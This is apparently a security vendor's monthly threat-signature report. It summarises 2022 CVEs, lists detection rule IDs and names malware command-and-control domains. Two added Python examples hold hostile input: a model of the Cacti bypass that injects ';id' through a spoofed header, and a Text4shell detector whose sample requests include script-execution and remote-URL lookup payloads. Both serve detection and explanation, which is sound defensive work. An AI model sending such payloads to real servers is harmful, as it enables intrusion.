Threat Signature Report

Here you will find information about the latest threat signatures generated by our specialists.

December/22

CVE-2022-26259

A buffer overflow in Xiongmai DVR devices NBD80X16S-KL, NBD80X09S-KL, NBD80X08S-KL, NBD80X09RA-KL, AHB80X04R-MH, AHB80X04R-MH-V2, AHB80X04-R-MH-V3, AHB80N16T-GS, AHB80N32F4-LME, and NBD90S0VT-QW allows attackers to cause a Denial of Service (DoS) via a crafted RTSP request.

 

New AppleJeus entries (recent Lazarus malware)

 

 2041658 – ET TROJAN Observed DNS Query to AppleJeus Domain (strainservice .com) (emerging-trojan.rules)
 2041659 – ET TROJAN Observed DNS Query to AppleJeus Domain (telloo .io) (emerging-trojan.rules)
 2041660 – ET TROJAN Observed DNS Query to AppleJeus Domain (wirexpro .com) (emerging-trojan.rules)
 2041661 – ET TROJAN Observed DNS Query to AppleJeus Domain (rebelthumb .net) (emerging-trojan.rules)
 2041662 – ET TROJAN Observed DNS Query to AppleJeus Domain (oilycargo .com) (emerging-trojan.rules)
 2041663 – ET TROJAN Observed DNS Query to AppleJeus Domain (bloxholder .com) (emerging-trojan.rules)
 2041664 – ET TROJAN Win32/AppleJeus CnC Checkin (POST) (emerging-trojan.rules)

 

CVE-2022-40259

AMI MegaRAC Redfish Arbitrary Code Execution

CVE-2022-2827
AMI MegaRAC User Enumeration Vulnerability
(Both CVEs concern the Redfish management API exposed by AMI MegaRAC BMC firmware. Redfish is a DMTF standard, not a Cisco protocol.)

CVE-2022-46169 (command injection via unauthorized access in Cacti)

Cacti is an open source platform which provides a robust and extensible operational monitoring and fault management framework for users. In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. The vulnerability resides in the `remote_agent.php` file. This file can be accessed without authentication. Its authorization function retrieves the IP address of the client via `get_client_addr` and resolves this IP address to the corresponding hostname via `gethostbyaddr`. After this, it is verified that an entry within the `poller` table exists, where the hostname corresponds to the resolved hostname. If such an entry was found, the function returns `true` and the client is authorized.

This authorization can be bypassed due to the implementation of the `get_client_addr` function. The function is defined in the file `lib/functions.php` and checks several `$_SERVER` variables to determine the IP address of the client. The variables beginning with `HTTP_` can be arbitrarily set by an attacker. Since there is a default entry in the `poller` table with the hostname of the server running Cacti, an attacker can bypass the authentication e.g. by providing the header `Forwarded-For: <TARGETIP>`. This way the function `get_client_addr` returns the IP address of the server running Cacti. The following call to `gethostbyaddr` will resolve this IP address to the hostname of the server, which will pass the `poller` hostname check because of the default entry.

After the authorization of the `remote_agent.php` file is bypassed, an attacker can trigger different actions. One of these actions is called `polldata`. The called function `poll_for_data` retrieves a few request parameters and loads the corresponding `poller_item` entries from the database. If the `action` of a `poller_item` equals `POLLER_ACTION_SCRIPT_PHP`, the function `proc_open` is used to execute a PHP script. The attacker-controlled parameter `$poller_id` is retrieved via the function `get_nfilter_request_var`, which allows arbitrary strings. This variable is later inserted into the string passed to `proc_open`, which leads to a command injection vulnerability. By e.g. providing `poller_id=;id` the `id` command is executed. In order to reach the vulnerable call, the attacker must provide a `host_id` and `local_data_id`, where the `action` of the corresponding `poller_item` is set to `POLLER_ACTION_SCRIPT_PHP`. Both of these ids (`host_id` and `local_data_id`) can easily be bruteforced. The only requirement is that a `poller_item` with a `POLLER_ACTION_SCRIPT_PHP` action exists. This is very likely on a production instance because this action is added by some predefined templates like `Device – Uptime` or `Device – Polling Time`.

In short, this command injection vulnerability allows an unauthenticated user to execute arbitrary commands if a `poller_item` with the `action` type `POLLER_ACTION_SCRIPT_PHP` (`2`) is configured. The authorization bypass should be prevented by not allowing an attacker to make `get_client_addr` (file `lib/functions.php`) return an arbitrary IP address. This could be done by not honoring the `HTTP_…` `$_SERVER` variables. If these should be kept for compatibility reasons it should at least be prevented to fake the IP address of the server running Cacti. This vulnerability has been addressed in both the 1.2.x and 1.3.x release branches with `1.2.23` being the first release containing the patch.
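The authorization bypass and the `poller_id` injection described above, modelled as an added Python example (this is not Cacti's PHP code). The list of `$_SERVER` keys, the host names, the IP addresses and the reverse-DNS table are constructed for the illustration, and the hardened `get_client_addr` that trusts only `REMOTE_ADDR` is one fix consistent with the recommendation above, not the exact upstream patch.

```python
"""Model of CVE-2022-46169: remote_agent.php authorisation bypass via
attacker-controlled HTTP_* headers, followed by command injection through
poller_id. Added illustration in Python; not Cacti's own code."""
import shlex

# Constructed fixture: the Cacti server's own address and the default
# 'poller' row, which Cacti seeds with the server's own hostname.
SERVER_IP = "10.0.0.5"
POLLER_TABLE = {"cacti.corp.example"}
# Constructed stand-in for gethostbyaddr(); unknown IPs resolve to themselves.
REVERSE_DNS = {"10.0.0.5": "cacti.corp.example", "203.0.113.9": "attacker.example"}

# Assumed approximation of the $_SERVER keys consulted by get_client_addr().
# Every HTTP_* key is derived from a request header, so the client controls it.
CLIENT_ADDR_KEYS = ("HTTP_X_FORWARDED_FOR", "HTTP_FORWARDED_FOR",
                    "HTTP_CLIENT_IP", "REMOTE_ADDR")

def get_client_addr_vulnerable(server_vars):
    """First non-empty candidate wins, headers before the socket peer."""
    for key in CLIENT_ADDR_KEYS:
        if server_vars.get(key):
            return server_vars[key].split(",")[0].strip()
    return None

def get_client_addr_fixed(server_vars):
    """Only the transport-level peer address is used for authorisation."""
    return server_vars.get("REMOTE_ADDR")

def remote_agent_authorized(server_vars, get_client_addr):
    """The poller hostname check from remote_agent.php."""
    ip = get_client_addr(server_vars)
    hostname = REVERSE_DNS.get(ip, ip)
    return hostname in POLLER_TABLE

SHELL_METACHARS = set(";|&`$\n")

def is_shell_injection(value):
    """True when a request value carries shell metacharacters such as ';id'."""
    return any(c in SHELL_METACHARS for c in value)

def poller_command_vulnerable(poller_id):
    """poller_id is spliced raw into the proc_open() command string."""
    return f"php -q poller.php --poller={poller_id}"

def poller_command_fixed(poller_id):
    """Reject anything but a numeric id, then quote defensively."""
    if not poller_id.isdigit():
        raise ValueError(f"rejected poller_id: {poller_id!r}")
    return f"php -q poller.php --poller={shlex.quote(poller_id)}"

def attack(server_vars, poller_id, hardened=False):
    """Return (authorized, command) for one request against either build."""
    getter = get_client_addr_fixed if hardened else get_client_addr_vulnerable
    if not remote_agent_authorized(server_vars, getter):
        return False, None
    build = poller_command_fixed if hardened else poller_command_vulnerable
    try:
        return True, build(poller_id)
    except ValueError:
        return True, None

if __name__ == "__main__":
    # Attacker at 203.0.113.9 spoofs the server's own IP in Forwarded-For.
    req = {"REMOTE_ADDR": "203.0.113.9", "HTTP_FORWARDED_FOR": SERVER_IP}
    print(attack(req, ";id"))                 # (True, 'php -q poller.php --poller=;id')
    print(attack(req, ";id", hardened=True))  # (False, None)
```

The two request dictionaries stand in for PHP's `$_SERVER`; in the vulnerable build the spoofed header both passes the poller check and reaches `proc_open` with the `;id` payload intact, while the hardened build fails at the first step and, even for a legitimate poller, refuses a non-numeric id.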

November/22

CVE-2022-31898

    gl-inet GL-MT300N-V2 Mango v3.212 and GL-AX1800 Flint v3.214 were discovered to contain multiple command injection vulnerabilities via the ping_addr and trace_addr function parameters.

CVE-2022-3602

    A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution. Many platforms implement stack overflow protections which would mitigate against the risk of remote code execution. The risk may be further mitigated based on stack layout for any given platform/compiler. Pre-announcements of CVE-2022-3602 described this issue as CRITICAL. Further analysis based on some of the mitigating factors described above have led this to be downgraded to HIGH. Users are still encouraged to upgrade to a new version as soon as possible. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. Fixed in OpenSSL 3.0.7 (Affected 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6).

Bad-reputation IP contributions.

    Additions of IPs with bad reputation across more than 200 port groups.

October/22

CVE-2022-36635

2039129 – ET EXPLOIT ZKBioSecurity SQL Injection Attempt (CVE-2022-36635) (emerging-exploit.rules)

ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.

A SQL injection vulnerability was found in ZKTeco ZKBioSecurity V5000 4.1.3, a physical-security management platform (elevators, access control, etc.).

CVE-2022-41352

 2039141 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M1 (emerging-exploit.rules)

 2039142 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M2 (emerging-exploit.rules)

 2039143 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M4 (emerging-exploit.rules)

 2039144 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M3 (emerging-exploit.rules)

 2039145 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M6 (emerging-exploit.rules)

 2039146 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M5 (emerging-exploit.rules)

 2039147 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M7 (emerging-exploit.rules)

 2039148 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-41352) M8 (emerging-exploit.rules)

An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavisd automatically prefers it over cpio.

A vulnerability in Zimbra in which an attacker can upload arbitrary files through the cpio loophole in amavisd, leading to access to other users' accounts.

CVE-2022-30333

2039149 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-30333) M1 (emerging-exploit.rules)

 2039150 – ET EXPLOIT Possible Zimbra Arbitrary File Upload (CVE-2022-30333) M2 (emerging-exploit.rules)


CVE-2022-40684

2039173 – ET WEB_SERVER [Cluster25] FortiOS Auth Bypass Attempt (CVE-2022-40684) (emerging-web_server.rules)

 2039419 – ET WEB_SERVER Successful FortiOS Auth Bypass Attempt – SSH Key Upload (CVE-2022-40684) (emerging-web_server.rules)

 2039420 – ET WEB_SERVER Successful FortiOS Auth Bypass Attempt – Admin Details Leaked (CVE-2022-40684) (emerging-web_server.rules)

An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.

An authentication bypass in Fortinet products (FortiOS 7.0.0 to 7.0.6 and 7.2.0 to 7.2.1, plus the FortiProxy and FortiSwitchManager versions listed above).

CVE-2022-42889

 2039464 – ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)

 2039465 – ET EXPLOIT Possible Apache Text4shell RCE Attempt Script Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)

 2039466 – ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)

 2039467 – ET EXPLOIT Possible Apache Text4shell RCE Attempt DNS Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)

 2039468 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)

 2039469 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)

 2039470 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Inbound) (emerging-exploit.rules)

 2039471 – ET EXPLOIT Possible Apache Text4shell RCE Attempt URL Prefix (CVE-2022-42889) (Outbound) (emerging-exploit.rules)

Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are:

– "script": execute expressions using the JVM script execution engine (javax.script)
– "dns": resolve DNS records
– "url": load values from URLs, including from remote servers

Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
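A detector for the three dangerous default lookups, added here as a Python example (it is not Apache's code and not the text of the ET rules listed above). The request lines are constructed; the detector URL-decodes repeatedly so that double-encoded payloads, which a single-decode match would miss, are still found.

```python
"""Detect ${script:...}, ${dns:...} and ${url:...} interpolation attempts
(CVE-2022-42889) in HTTP request lines. Added example; constructed input."""
import re
from urllib.parse import unquote

# The default StringLookup prefixes in Commons Text 1.5-1.9 that execute code
# or reach the network. Other defaults (env, sys, date, ...) are not flagged.
DANGEROUS_PREFIXES = ("script", "dns", "url")

# StringSubstitutor's default delimiters are "${" and "}"; whitespace around
# the prefix is tolerated so "${ script :" still matches.
PATTERN = re.compile(r"\$\{\s*(" + "|".join(DANGEROUS_PREFIXES) + r")\s*:",
                     re.IGNORECASE)

def normalize(value, max_rounds=3):
    """Undo repeated URL-encoding until the text stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_text4shell(request_line):
    """Dangerous prefixes found in one request line, in order of appearance."""
    return [m.group(1).lower() for m in PATTERN.finditer(normalize(request_line))]

def scan(request_lines):
    """Map line index -> list of prefixes for every line that triggers."""
    hits = {}
    for i, line in enumerate(request_lines):
        found = find_text4shell(line)
        if found:
            hits[i] = found
    return hits

# Constructed sample traffic: script prefix (URL-encoded), dns prefix (plain),
# url prefix (double-encoded), a benign env lookup and an ordinary request.
SAMPLE_REQUESTS = [
    "GET /search?q=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27id%27%29%7D HTTP/1.1",
    "GET /search?q=${dns:address|example.com} HTTP/1.1",
    "GET /?u=%2524%257Burl%253Ahttp%253A%252F%252F198.51.100.7%252Fp%257D HTTP/1.1",
    "POST /api/config name=${env:HOME} HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

if __name__ == "__main__":
    for index, prefixes in scan(SAMPLE_REQUESTS).items():
        print(f"line {index}: {', '.join(prefixes)} lookup")
```

The `env` lookup is deliberately left out of the dangerous set: it is still a default in 1.9 but only reads local variables, and flagging it would drown real hits in noise.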

CVE-2022-22241

2039591 – ET TROJAN Potential Juniper Phar Deserialization RCE Attempt (CVE-2022-22241) (emerging-trojan.rules)

An Improper Input Validation vulnerability in the J-Web component of Juniper Networks Junos OS may allow an unauthenticated attacker to access data without proper authorization. Utilizing a crafted POST request, deserialization may occur which could lead to unauthorized local file access or the ability to execute arbitrary commands. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.

A vulnerability in the J-Web component of Junos OS: an unauthenticated attacker can send a crafted POST request that triggers deserialization, leading to unauthorized local file access or arbitrary command execution.

CVE-2022-22244

2039592 – ET TROJAN Potential Juniper XPATH Injection Attempt (CVE-2022-22244) (emerging-trojan.rules)


CVE-2022-22242

2039598 – ET TROJAN Potential Juniper Reflected XSS Attempt (CVE-2022-22242) (emerging-trojan.rules)

A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim’s browser in the context of their session within J-Web. This issue affects Juniper Networks Junos OS all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.

Reflected XSS vulnerability found in the J-Web component of Junos OS.

CVE-2022-22245

2039599 – ET TROJAN Potential Juniper Path Traversal RCE Attempt (CVE-2022-22245) (emerging-trojan.rules)

A Path Traversal vulnerability in the J-Web component of Juniper Networks Junos OS allows an authenticated attacker to upload arbitrary files to the device by bypassing validation checks built into Junos OS. The attacker should not be able to execute the file due to validation checks built into Junos OS. Successful exploitation of this vulnerability could lead to loss of filesystem integrity. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.

CVE-2022-22246

 2039600 – ET TROJAN Potential Juniper PHP Local File Inclusion Attempt (CVE-2022-22246) (emerging-trojan.rules)

A PHP Local File Inclusion (LFI) vulnerability in the J-Web component of Juniper Networks Junos OS may allow a low-privileged authenticated attacker to execute an untrusted PHP file. By chaining this vulnerability with other unspecified vulnerabilities, and by circumventing existing attack requirements, successful exploitation could lead to a complete system compromise. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.

September/22

ATTACK_RESPONSE Nishang Invoke-PowerShellTcp

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.

Nishang is a framework and collection of scripts and payloads that make PowerShell usable for offensive work (a tool used especially in penetration testing and red teaming).

ET MALWARE TA453/APT35 HYPERSCRAPE

New ET MALWARE TA453/APT35 HYPERSCRAPE signatures were added to the Blockbit UTM and published in our official repository.

Hyperscrape: the attackers run it on their own machines to download emails from victims' inboxes using previously obtained credentials and to delete the traces of the tool's activity.

OSX/SHLAYER

Trojan:OSX/Shlayer identifies a file that appears to be an update for a popular media player, but when launched will instead run scripts that download other unwanted programs onto the computer.

OSX/SHLAYER is a trojan that usually poses as an update for a popular media player; when run, it instead executes a series of scripts that download unwanted programs onto the computer.

Confucius APT

Confucius is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between Confucius and Patchwork, particularly in their respective custom malware code and targets.

Confucius is a cyber-espionage group that has primarily targeted military personnel, high-profile figures, business people and government organizations in South Asia since 2013. It shows some similarity to the Patchwork group.

August/22

VMware Authentication Bypass

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI can obtain administrative access without needing to authenticate.

Signature generated by Blockbit:

sid: 2038475
ET EXPLOIT Attempted VMware Authentication Bypass (CVE-2022-31656) (emerging-exploit.rules)
 
Facebook Credential Theft

This signature matches a Facebook-themed landing page capable of stealing login credentials.

Signature generated by Blockbit:

sid: 2037869
ET CURRENT_EVENTS Facebook Credential Theft Landing Page 2022-07-29 (emerging-current_events.rules)

ET TROJAN Lazarus APT

The Lazarus Group has strong ties to North Korea. North Korea benefits from conducting cyber operations because a small group of operators can pose an asymmetric threat, especially to South Korea.

Signature generated by Blockbit:

sid: 2037957
ET TROJAN Lazarus APT Related Activity (GET) (emerging-trojan.rules)

Patchwork APT Related Activity M3 (POST)

This cyber-espionage group targets high-profile diplomats and economists with international ties to China, using a custom set of attack tools. The attacks were usually delivered through spear-phishing campaigns or watering-hole attacks.

Signature generated by Blockbit:

sid: 2037963
ET TROJAN Patchwork APT Related Activity M3 (POST) (emerging-trojan.rules)

SHARPEXT CnC Domain

Signatures generated by Blockbit:

sid: 2037955
ET TROJAN SHARPEXT CnC Domain in DNS Lookup (gonamod .com) (emerging-trojan.rules)
 
sid: 2037956
ET TROJAN SHARPEXT CnC Domain in DNS Lookup (siekis .com) (emerging-trojan.rules)

Shuckworm CnC Domain

Signatures generated by Blockbit:

sid: 2038530
ET TROJAN Shuckworm CnC Domain (leonardis .ru) in DNS Lookup (emerging-trojan.rules)
 
sid: 2038531
ET TROJAN Shuckworm CnC Domain (destroy .asierdo .ru) in DNS Lookup (emerging-trojan.rules)
 
sid: 2038532
ET TROJAN Shuckworm CnC Domain (heato .ru) in DNS Lookup (emerging-trojan.rules)
 
sid: 2038533
ET TROJAN Shuckworm CnC Domain (motoristo .ru) in DNS Lookup (emerging-trojan.rules)
 
sid: 2038534
ET TROJAN Shuckworm CnC Domain (a0698649 .xsph .ru) in DNS Lookup (emerging-trojan.rules)
 
sid: 2038535
ET TROJAN Shuckworm CnC Domain (pasamart .ru) in DNS Lookup (emerging-trojan.rules)

TROJAN Observed DNS Query to UNC3890

Signatures generated by Blockbit:

sid: 2038558
ET TROJAN Observed DNS Query to UNC3890 Domain (pfizerpoll .com) (emerging-trojan.rules)
 
sid: 2038559
ET TROJAN Observed DNS Query to UNC3890 Domain (naturaldolls .store) (emerging-trojan.rules)
 
sid: 2038560
ET TROJAN Observed DNS Query to UNC3890 Domain (rnfacebook .com) (emerging-trojan.rules)
 
sid: 2038561
ET TROJAN Observed DNS Query to UNC3890 Domain (xxx-doll .com) (emerging-trojan.rules)
 
sid: 2038562
ET TROJAN Observed DNS Query to UNC3890 Domain (celebritylife .news) (emerging-trojan.rules)
 
sid: 2038563
ET TROJAN Observed DNS Query to UNC3890 Domain (office365update .live) (emerging-trojan.rules)
 
sid: 2038564
ET TROJAN Observed DNS Query to UNC3890 Domain (fileupload .shop) (emerging-trojan.rules)

Zimbra RCE Attempt Inbound (CVE-2022-27925)

Zimbra Collaboration (also known as ZCS) 8.8.15 and 9.0 has an mboximport feature that receives a ZIP file and extracts files from it. An authenticated user with administrator rights can upload arbitrary files to the system, leading to directory traversal.

Signature generated by Blockbit:

sid: 2038504
ET EXPLOIT Possible Zimbra RCE Attempt Inbound (CVE-2022-27925) (emerging-exploit.rules)

July/22

Exploit VMware

The vulnerability is a critical remote code execution (RCE) flaw (CVSS 9.8) affecting VMware Workspace ONE Access and VMware Identity Manager, two widely used software products.

Signatures generated by Blockbit

Sid:2035876
VMWare Server-side Template Injection RCE (CVE-2022-22954)
 
Sid:2035874
VMWare Server-side Template Injection RCE (CVE-2022-22954)

Sid:2035875
VMWare Server-side Template Injection RCE (CVE-2022-22954)

Exploit Adobe ColdFusion 11

Signatures generated by Blockbit

sid:2036731
Adobe ColdFusion 11 – LDAP Java Object Deserialization RCE (GET) CVE-2018-15957

sid:2036732
Adobe ColdFusion 11 – LDAP Java Object Deserialization RCE (POST) CVE-2018-15957

Apache log4j RCE Attempt - HTTP URI Obfuscation

Signature generated by Blockbit

sid:2037046
Possible Apache log4j RCE Attempt – HTTP URI Obfuscation (CVE-2021-44228) (Inbound)
 
sid:2037047
Possible Apache log4j RCE Attempt – HTTP URI Obfuscation (CVE-2021-44228) (Outbound)

Exploit Attempted Mitel MiVoice Connect Data Validation RCE Inbound

A ransomware attack was deployed against an unnamed target using a Mitel VoIP appliance as the entry point.

Signature generated by Blockbit

sid:2037121
Attempted Mitel MiVoice Connect Data Validation RCE Inbound (CVE-2022-29499)

Exploit Kramer VIAware

All tested versions of KramerAV VIAware allow privilege escalation through a sudo misconfiguration, enabling the execution of several dangerous commands, including unzip, systemctl and dpkg.

Signature generated by Blockbit:
sid:2036738
Kramer VIAware Remote Code Execution (CVE-2021-35064 CVE-2021-36356)

Exploit Zyxel NWA-1100-NH

A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.

Signature generated by Blockbit

sid:2036737
Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)

Follina vulnerability

Rated high severity, this vulnerability affects the Microsoft Support Diagnostic Tool (MSDT) and can be exploited by attackers to execute malicious code remotely.

Signatures generated by Blockbit

sid:2036726
Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)
 
sid:2037083
Possible Microsoft Support Diagnostic Tool Exploitation Inbound

June/22

Exploit dotCMS

When files are uploaded to dotCMS through the content API, dotCMS writes the file to a temporary directory. In this vulnerability, dotCMS does not sanitize the file name passed in the multipart request header, and therefore does not sanitize the temporary file name either.

Signatures generated by Blockbit

sid:2036457

dotCMS Arbitrary File Upload Attempt M1

 
sid:2036458
dotCMS Arbitrary File Upload Attempt M2

Exploit Zyxel Firewalls

This vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), which includes the ATP, VPN and USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, tracked as CVE-2022-30525, allows a remote, unauthenticated attacker to achieve arbitrary code execution as the nobody user on the affected device.

Signature generated by Blockbit

sid:2036596
[Rapid7] Zyxel ZTP setWanPortSt mtu Parameter Exploit Attempt (CVE 2022-30525)

Exploit Apache CouchDB

Apache recently issued a risk advisory for an Apache CouchDB remote code execution vulnerability, tracked as CVE-2022-24706 and rated critical.

In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authentication and gain administrator privileges.

Signature generated by Blockbit

sid:2036650
Default Apache CouchDB Erlang Cookie Observed (CVE-2022-24706)

Exploit Telesquare SDT-CW3B1 1.1.0

Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

Signature generated by Blockbit

sid:2036663
Telesquare SDT-CW3B1 1.1.0 – OS Command Injection (CVE-2021-46422)

Exploit SolarView Compact

SolarView Compact ver.6.00 was found to contain a command injection vulnerability via conf_mail.php.

Signature generated by Blockbit:
sid:2036649
SolarView Compact Command Injection Inbound (CVE-2022-29303)

Exploit ThinkPHP

Given the potentially wide impact of this vulnerability, users are advised to stay alert and take the necessary measures to protect themselves.

Signatures generated by Blockbit

sid:2036598
Attempted ThinkPHP < 5.2.x RCE Inbound (CVE-2018-20062)

sid:2036599
Attempted ThinkPHP < 5.2.x RCE Outbound (CVE-2018-20062)

Exploit Sophos Firewall

An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code on Sophos Firewall v18.5 MR3 and earlier.

Signatures generated by Blockbit

sid:2036548
Sophos Firewall Authentication Bypass (CVE-2022-1040)
 
sid:2036549
Sophos Firewall Authentication Bypass (CVE-2022-1040) Server Response M1
 
sid:2036550
Sophos Firewall Authentication Bypass (CVE-2022-1040) Server Response M2

May/22

Exploit VMware

The vulnerability is a critical remote code execution (RCE) flaw (CVSS 9.8) affecting VMware Workspace ONE Access and VMware Identity Manager, two widely used software products.

Signatures generated by Blockbit

Sid:2035876
VMWare Server-side Template Injection RCE (CVE-2022-22954)
 
Sid:2035874
VMWare Server-side Template Injection RCE (CVE-2022-22954)

Sid:2035875
VMWare Server-side Template Injection RCE (CVE-2022-22954)

Exploit F5 BIG-IP

A recently disclosed F5 BIG-IP vulnerability has been used in destructive attacks that attempt to wipe a device's file system and render the server unusable.

Signatures generated by Blockbit

sid:2036546
F5 BIG-IP iControl REST Authentication Bypass (CVE 2022-1388) M1
 
sid:2036547
F5 BIG-IP iControl REST Authentication Bypass Server Response (CVE 2022-1388)

Nginx Zero-Day

An nginx zero-day RCE issue was identified in the reference implementation of the nginx LDAP-auth daemon, details of which leaked briefly.

Signature generated by Blockbit

sid:2035897
Possible NGINX Reference LDAP Query Injection Attack

Exploit Redis RCE Attempt

Redis, a persistent key-value database, was found to be prone to a Lua sandbox escape due to a packaging issue (Debian-specific), which could result in remote code execution.

Signatures generated by Blockbit

sid:2035718
Redis RCE Attempt (CVE-2022-0543) M1
 
sid:2035719
Redis RCE Attempt (CVE-2022-0543) M2
 
sid:20357120
Possible Redis RCE Attempt – Dynamic Importing of liblua

Exploit GitLab: login attempt with hard-coded password

A hard-coded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5 and 14.9 prior to 14.9.2, allowing attackers to take over those accounts.

Signatures generated by Blockbit:
 
sid: 2035751
Gitlab Login Attempt with hard-coded password (CVE-2022-1162)
 
sid: 2035750
Gitlab Login Attempt with hard-coded password (CVE-2022-1162)

Exploit Psychic Signatures in Java

